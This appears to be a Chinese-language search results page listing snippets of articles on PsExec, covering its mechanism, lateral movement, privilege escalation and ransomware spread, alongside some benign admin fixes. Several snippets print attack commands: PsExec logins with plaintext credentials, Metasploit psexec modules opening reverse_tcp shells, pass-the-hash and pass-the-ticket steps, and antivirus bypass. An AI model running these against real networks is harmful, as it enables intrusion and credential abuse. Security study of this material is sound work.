首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏HACK学习

    psexec原理分析

    Psexec被编写的初衷是为了方便服务器管理员管理大量的机器而开发的,但由于它的便捷,同时也被黑客使用。 psexec工具下载地址: https://docs.microsoft.com/en-us/sysinternals/downloads/psexec cs也直接集成了这款工具 ? psexec64来横向win2008 ? \PsExec.exe \\192.168.154.31 -u administrator -p 123456 cmd ? ? 后记 本次研究psexec到这就基本结束了,我自己是没有能力研究出来的,参考了很多大佬的文章,尤其是倾旋大佬,再次感谢!

    1.5K40发布于 2021-06-24
  • 来自专栏谢公子学安全

    psexec工具的使用

    Psexec工具的使用 作者:谢公子 @深蓝攻防实验室 目录 psexec使用前提 工作组环境 域环境 登录域控 以域用户登录域成员主机 以本地用户登录域成员主机 MSF中的psexec模块 Impacket中的psexec.py psexec 是 windows 下非常好的一款远程命令行工具。 psexec.exe依赖于admin共享,而impacket下的psexec.py则依赖于admin或c psexec的基本原理是:通过管道在远程目标机器上创建一个psexec服务,并在本地磁盘中生成一个名为 然后,通过psexec服务运行命令,运行结束后删除服务。 在使用psexec执行远程命令时,会在目标系统中创建一个psexec服务。命令执行后,psexec服务将会被自动删除。 04 MSF中的psexec模块 END MSF中的psexec,主要讲以下两个: exploit/windows/smb/psexec:该模块生成的payload是exe程序 exploit/windows

    12.1K20编辑于 2022-01-20
  • 来自专栏边城码农

    PsExec流量日志分析以及实现

    前言psexec是sysinternals的一款强大的软件,通过它可以提权和执行远程命令,对于批量大范围的远程运维能起到很好的效果,尤其是在域环境下。 正文本文环境:Win10Win Server 2016先模拟一下PsExec的使用。 图片psexec的基本原理是:通过管道在远程目标机器上创建一个psexec服务,并在本地磁盘中生成一个名为"PSEXESVC"的二进制文件。然后,通过psexec服务运行命令,运行结束后删除服务。 PSExec的使用条件:对方主机开启了 admin共享,如果关闭了admin共享,会提示:找不到网络名如果是工作组环境,则必须使用administrator用户连接,使用普通用户连接会提示:登录失败:

    79430编辑于 2022-10-21
  • 来自专栏漫流砂

    提权(三) PsExec 提权

    PsExec属于SysInternalSuite (一个windows的内核的套件),是其中一个工具 下载地址: https://technet.microsoft.com/en-us/sysinternals 可以看到有147个小工具 psexec 这个工具可以以System账号执行一个程序 适合于本地提权 psexec -i -s cmd -i 使用交互模式运行程序 -s 使用SYSTEM账号来运行 ?

    5.9K30发布于 2020-08-20
  • 来自专栏漏洞知识库

    横向移动 - PsExec 的使用

    PsExec PsExec 主要用于大批量 Windows 主机的维护,在域环境下效果尤其好。 PsExec 的基本原理是:通过管道在远程目标主机上创建一个 psexec 服务,并在本地磁盘中生成一个名为”PSEXESVC“的二进制文件,然后通过 psexec 服务运行命令,运行结束后删除服务。 PsExec的使用 PsExec的使用 ---- 首先,需要获取目标操作系统的交互式 Shell。 ---- Metasploit 使用 PsExec 模块 查找有关 psexec 的模块: search psexec ? psexec_psh 模块和 psexec 模块的使用方法相同,二者的区别在于,通过 psexec_psh 模块上传的 payload 是 powershell 版本的。

    12.4K10发布于 2020-11-25
  • 来自专栏红队蓝军

    如何自己实现一个Psexec

    Psexec Psexec被编写的初衷是为了方便服务器管理员管理大量的机器而开发的,但由于它的便捷,同时也被黑客使用。 psexec工具下载地址:https://docs.microsoft.com/en-us/sysinternals/downloads/psexec cs也直接集成了这款工具 Psexec原理分析 环境 win10 :192.168.154.7 win server 2008 X64 :192.168.154.31 假设已经得到win10主机的system权限在cs上通过psexec64来横向win2008 \PsExec.exe \\192.168.154.31 -u administrator -p 123456 cmd 设置过滤规则 ip.src==192.168.154.31 or ip.dst 实现psexec 一.与目标主机建立SMB连接 WNetAddConnection2 DWORD WNetAddConnection2W( LPNETRESOURCEW lpNetResource,

    75510编辑于 2022-05-17
  • 来自专栏Windows技术交流

    psexec提权删除残留的显卡驱动文件

    下载psexechttps://live.sysinternals.com/PsExec.exehttps://live.sysinternals.com/PsExec64.exe下载后放到服务器C:\ Windows\System32目录下然后以Administrator身份在cmd命令行执行psexec.exe -accepteula -nobanner -i -s powershellpsexec.exe -accepteula -nobanner -i -s cmd或PsExec64.exe -accepteula -nobanner -i -s powershellPsExec64.exe -accepteula -nobanner -i -s cmdpsexec后面的参数-accepteula -nobanner 是接受协议、隐藏回显头部信息的,可有可无,主要是后面的-is简单记的话就是psexec -is cmd或psexec -is powershell,执行后会打开一个有system权限(比Administrator权限大)的窗口,在这个窗口里执行你想执行的命令,比如删除某个有权限保护但没啥用的文件夹

    1.8K10编辑于 2022-12-01
  • 来自专栏FreeBuf

    GlobeImposter2.0再出新变种,疑似利用PsExec内网传播

    近日,深信服安全团队发现了GlobeImposter2.0勒索病毒新变种,该变种疑似利用微软官网工具PsExec进行内网传播并使用了新的勒索界面。 GlobeImposter2.0最新变种详细分析 在被勒索的主机中,发现勒索时间点生成了PsExec服务以及3个脚本文件: ? PsExec是微软发布的一个轻量级telnet替代工具,使用者无需手动安装客户端软件即可执行其他系统上的进程,并且可以获得与控制台应用程序相当的完全交互性。

    93200发布于 2019-10-10
  • 来自专栏悟空聊架构 | 公众号

    玩转PowerShell第二节——【利用PsExec进行远程调用】-技术&分享

    本篇将讲到用PsExec.exe这个工具进行远程调用。 1.首次运行PowerShell.exe 双击PowerShell.exe,同意licence条款。 ? 2.查看PowerShell帮助 ? \PsExec \\$MachineIP -u $DomainUser -p $Password -i 0 -s -w $WorkPath powershell "$WorkPath\Scripts\test.ps1 $Param" 注意: 1.远程机器磁盘上需要有“$WorkPath\Scripts\test.ps1”这个文件; 2.远程机器上不需要有PsExec.exe文件。 \PsExec \\$MachineIP -u $DomainUser -p $Password -h -i 0 -s -w $WorkPath powershell "$WorkPath\Scripts \PsExec -i -s -w $WorkPath powershell ".\test.ps1" 结果如下图所示: ?

    1.9K80发布于 2018-05-18
  • 来自专栏漏洞知识库

    域渗透不用进程窃取如何横向 Bypass Psexec AV 拿到域控?

    由于当前内网是有 VIPRE AV 的,不能使用常规的 Psexec 和 WMI,不然必被拦截! 这个时候我使用我插件里的工具进行 Psexec:(其实有很多工具都可以实现 Bypass AV 横向 psexec 的,我只写了一个(github上的项目),有空再加上去发出来给兄弟们) ? ?

    1.7K60发布于 2021-08-06
  • 来自专栏Windows技术交流

    psexec 提权时报错 Error creating key file on ……找不到网络名

    psexec 提权时报错 Error creating key file on ……找不到网络名解决方案:执行net share看有没有如下图的ADMIN$没有的话执行下2句命令reg add "HKEY_LOCAL_MACHINE CurrentControlSet\Services\LanmanServer\Parameters" /v "AutoShareWks" /t REG_DWORD /d 1 /f执行命令后重启系统就可以了正常执行提权命令了,例如:PsExec64 .exe -accepteula -nobanner -i -s powershellPsExec64.exe -accepteula -nobanner -i -s cmd网上还有说使用psexec 2.20版本没有这个报错,说是psexec 2.3*的bug,https://docs.microsoft.com/en-us/answers/questions/522749/psexec-after

    4.7K40编辑于 2022-08-04
  • 来自专栏OneTS安全团队

    红队攻防实战篇-PSexec等工具碰到的代理问题

    PSexec等工具碰到的代理问题 在内网渗透使用proxifier代理到内网的情况下,经常会碰到代理不同的问题,现模拟场景对这类问题进行复现还原。 后续操作均在192.168.172.128进行 proxifier的代理规则仅设置目标地址规则 测试内容 ▪net use等命令 无法通过代理 ▪psexec psexec.exe无法通过代理执行命令 impact工具包中的psexec可行 ▪wmiexec impact工具包中的wmiexec可行 ▪smbexec impact工具包中的smbexec可行 ▪atexec.py impact工具包中的 atexec可行 ▪exe情况 针对某些特殊的环境,我们不能使用python环境,可能需要把python打包成exe使用,针对这些情况进行测试 ▪psexec 在使用python打包后,可正常执行 解决方案

    26700编辑于 2025-02-07
  • 来自专栏《ATT&CK视角下的红蓝攻防对抗》

    ATT&CK视角下的红蓝对抗:二十一.横向移动之利用Psexec进行横向渗透

    Psexec的设计目的是替代telnet来帮助系统管理员进行远程管理。 进行横向渗透三.利用Psexec进行横向渗透 Psexec最早由Mark Russinovich创建并发布在Sysinternals Suite上,Sysinternals Suite是微软发布的工具程序集 Psexec的设计目的是替代telnet来帮助系统管理员进行远程管理。 通过Psexec的-s参数,可以指定程序以System权限运行。 当建立IPC$连接后,使用Psexec连接目标机器,执行命令Psexec.exe \\192.168.1.3-s cmd.exe,即可与靶标机器建立交互式会话,命令执行结果如图1-5所示。

    95010编辑于 2023-11-18
  • 来自专栏FreeBuf

    Gargamel:一款功能强大的信息安全取证工具

    你还需要确保下列程序已经存储在了跟Gargamel相同的目录之中: 可点击底部【阅读原文】下载 psexec paexec winpmem plink和pscp SharpRDP WMImplant exe : gargamel.exe -c JanovPC -u Jano -d WORKSPACE --psexec -p nbusr123 -o testResults 其他连接方式 PsExec是其中一种支持的连接方法 ,我们可以将—psexec替换为下列选项: —psexec —psrem —rdp —wmi —ssh 我们也可以一次使用多种方法。 比如说,同时使用PsExec和RDP: gargamel.exe -c 192.168.42.47 -u Jano --psexec --rdp -o testResults 获取内存 为了获取内存导转储 (Windows targets only) --psexec Acquire evidence from Windows machine using PsExec

    95820发布于 2021-03-25
  • 来自专栏LuckySec网络安全

    内网渗透 - 哈希传递攻击

    ) > use exploit/windows/smb/psexec [*] Using configured payload windows/meterpreter/reverse_tcp msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter /reverse_tcp msf6 exploit(windows/smb/psexec) > set lhost 10.10.10.2 lhost => 10.10.10.2 msf6 exploit (windows/smb/psexec) > set rhost 10.10.10.10 rhost => 10.10.10.10 msf6 exploit(windows/smb/psexec) > ) > set lhost 10.10.10.2 lhost => 10.10.10.2 msf6 exploit(windows/smb/psexec) > set rhost 10.10.10.20

    1.1K60编辑于 2022-11-02
  • 来自专栏红蓝对抗

    域渗透-横向移动手法总结

    横向psexec 是 windows 官方自带的,不会存在查杀问题,属于 pstools 利用 PsExec 可以在远程计算机上执行命令,其基本原理是通过管道在远程目标主机上创建一个psexec 服务, 对方开放 445 端口,就相当于开放了 smb 协议psexec 第一种:先有 ipc 链接,psexec 需要明文或 hash 传递PsExec64.exe /accepteula /s \\192.168.0.123 /Administrator@10.10.10.152在使用 PsExec 时需要注意以下几点:• 需要远程系统开启 admin$ 共享(默认是开启的)• 因为 PsExec 连接的原理是基于 IPC • 在使用 PsExec 执行远程命令时,会在目标系统中创建一个 psexec 的服务,命令执行完后,psexec 服务将被自动删除。 由于 Windows 默认不会将 WMI 的操作记录在日志里,同时现在越来越多的杀软将PsExec 加入了黑名单,因此 WMI 比 PsExec 隐蔽性要更好一些。

    61220编辑于 2025-06-30
  • 来自专栏超前沿网络空间安全全栈学习宝典

    红队/白帽必经之路(21)——实战之使用 ms17-010 永恒之蓝漏洞对 win7 PC 进行渗透进而达到勒索[既然是红队,那就对自己狠一点]

    话接上集session保存在后台之后 使用 hash 值登录系统 msf6 exploit(multi/handler) > back msf6 > use exploit/windows/smb/psexec [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/smb/psexec 配置用户信息 msf6 exploit(windows/smb/psexec) > set SMBUser xuegod SMBUser => xuegod 密码使用哈希值 msf6 exploit( /smb/psexec) > exploit bash汇总: msf6 exploit(multi/handler) > back msf6 > use exploit/windows/smb/psexec (windows/smb/psexec) set SMBPass [-] Unknown command: 密� msf6 exploit(windows/smb/psexec) > set SMBPass

    25810编辑于 2024-12-25
  • 来自专栏Bypass

    域渗透 | Kerberos攻击速查表

    \PsExec.exe -accepteula \\<remote_hostname> cmd 0x05 Pass The Ticket (PTT) 从Linux中获得tickets 检查tickets \Rubeus.exe ptt /ticket:<ticket_kirbi_file> 使用PsExec在远程计算机中执行cmd : . \Rubeus.exe ptt /ticket:<ticket_kirbi_file> 使用PsExec在远程计算机中执行cmd : . \PsExec.exe -accepteula \\<remote_hostname> cmd 0x07 Golden ticket 使用 Impacket 示例: # To generate the \Rubeus.exe ptt /ticket:<ticket_kirbi_file> 使用PsExec在远程计算机中执行cmd : .

    2.1K20发布于 2020-01-02
  • 来自专栏重生信息安全

    由浅入深的域渗透系列一(下)

    横向移动 psexec 直接kllist看到当前存在凭证 -accepteula初次打开会出现一堆信息,添加这个命令不会出现一堆信息 PsExec.exe -accepteula \\owa.god.org cmd PsExec.exe \\owa.god.org -u god\Administrator -p hongrisec@2019: cmd.exe PsExec.exe \\192.168.52.138 ) > use exploit/windows/smb/psexec msf5 exploit(windows/smb/psexec) > show options set payload ) > set RHOST 192.168.52.141 RHOST => 192.168.52.141 msf5 exploit(windows/smb/psexec) > exploit 执行命令 use auxiliary/admin/smb/psexec_command msf5 auxiliary(admin/smb/psexec_command) > set RHOSTS 192.168.52.138

    2.1K20发布于 2020-06-04
  • 来自专栏Windows技术交流

    怎样关闭和复原135 、139 、445端口?

    psexec64.exe放到system32目录,https://live.sysinternals.com/PsExec.exehttps://live.sysinternals.com/PsExec64 .exe然后执行【psexec.exe】psexec.exe -accepteula -nobanner -i -s reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft \Rpc\Internet" /f或psexec.exe -accepteula -nobanner -i -s reg delete "HKLM\SOFTWARE\Microsoft\Rpc\Internet " /f【psexec64.exe】psexec64.exe -accepteula -nobanner -i -s reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft \Rpc\Internet" /f或psexec64.exe -accepteula -nobanner -i -s reg delete "HKLM\SOFTWARE\Microsoft\Rpc\Internet

    11.8K40编辑于 2022-06-13
领券